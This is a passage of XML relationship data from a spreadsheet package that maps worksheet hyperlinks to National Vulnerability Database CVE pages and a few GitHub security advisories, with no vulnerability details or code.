Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74236" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1487" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880"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76461"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62815" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77995" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77998" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId37" /><Relationship 